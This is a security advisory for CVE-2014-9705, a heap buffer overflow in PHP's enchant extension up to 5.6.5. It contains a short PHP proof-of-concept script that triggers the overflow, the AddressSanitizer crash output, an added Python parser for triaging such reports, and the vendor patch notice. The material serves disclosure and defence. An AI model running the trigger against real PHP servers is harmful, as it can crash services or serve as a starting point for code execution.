PHP Heap Buffer Overflow Vulnerability
Published: 2014-12-05
Updated: 2015-03-16
Affected systems:
PHP PHP <= 5.6.5
Description:
CVE(CAN) ID: CVE-2014-9705
PHP is a general-purpose open-source scripting language.
In PHP 5.6.5 and earlier, the enchant_broker_request_dict() function contains a heap buffer overflow. A remote attacker can exploit it to overwrite 4 bytes of a heap buffer, causing a denial of service or arbitrary code execution.
<*Source: PHP
Link: https://www.htbridge.com/advisory/HTB23252
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users act at their own risk!
<?php
$tag = 'en_US';
$r = enchant_broker_init();
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
?>
Result:
========
[Fri Dec 5 13:32:59 2014] Script: '/home/symeon/Desktop/dict.php'
---------------------------------------
/home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning: OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
Start: OK
End: Overflown (magic=0x00000034 instead of 0xAF9A0F68)
At least 4 bytes overflown
---------------------------------------
=================================================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
#0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
#10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
#0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
#1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
#2 0xb616ef1e in ?? ??:0
#3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
#4 0xb6184b7f in __asan_report_error ??:?
#5 0xb617db2e in __asan_report_store4 ??:?
#6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
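The AddressSanitizer report above is the evidence a defender actually triages: the bug class, whether the faulting access is a read or a write, its size, and the first frame in the program under test rather than in the sanitizer runtime. The following Python parser is an added example, not part of the advisory or of PHP; it works on the report format shown above, with the sample input constructed from the first lines of that report, and labels an out-of-bounds write as memory corruption rather than a mere crash.

```python
import re

# Constructed sample: the opening lines of the AddressSanitizer report quoted in this advisory.
SAMPLE_REPORT = """\
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
    #0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
"""

ERROR_RE = re.compile(
    r"^==(?P<pid>\d+)== ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-fA-F]+)", re.M)
ACCESS_RE = re.compile(
    r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at (?P<addr>0x[0-9a-fA-F]+) thread (?P<thread>T\d+)", re.M)
FRAME_RE = re.compile(
    r"^\s*#(?P<n>\d+) 0x[0-9a-fA-F]+ in (?P<func>\S+) (?P<file>\S+?)(?::(?P<line>\d+))?$", re.M)

# Frames that belong to the sanitizer runtime itself (as in the second trace above), not to the program.
RUNTIME_PREFIXES = ("__asan", "__sanitizer", "_ZN11__sanitizer", "_Zda", "??")


def parse_asan_report(text):
    """Extract bug class, faulting access and first application frame; None if this is not an ASan report."""
    err = ERROR_RE.search(text)
    acc = ACCESS_RE.search(text)
    if err is None or acc is None:
        return None
    frames = [m.groupdict() for m in FRAME_RE.finditer(text)]
    # Blame the first frame outside the sanitizer runtime, so the report points at the real code.
    blamed = next((f for f in frames if not f["func"].startswith(RUNTIME_PREFIXES)), None)
    return {
        "pid": int(err["pid"]),
        "kind": err["kind"],
        "address": acc["addr"],
        "op": acc["op"],
        "size": int(acc["size"]),
        "thread": acc["thread"],
        "function": blamed["func"] if blamed else None,
        "file": blamed["file"] if blamed else None,
        "line": int(blamed["line"]) if blamed and blamed["line"] else None,
    }


def triage(report):
    """Coarse severity label: an out-of-bounds write is memory corruption, a read is a leak or crash."""
    if report["kind"].endswith("overflow") and report["op"] == "WRITE":
        return "high: out-of-bounds write, possible code execution"
    if report["op"] == "READ":
        return "medium: out-of-bounds read, crash or information disclosure"
    return "review: " + report["kind"]


if __name__ == "__main__":
    r = parse_asan_report(SAMPLE_REPORT)
    print(r, triage(r))
```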
Recommendations:
Vendor patch:
PHP
---
The vendor has released an upgrade that fixes this security issue. Download version 5.6.6 from the vendor's homepage:
http://php.net/archive/2015.php#id2015-02-19-2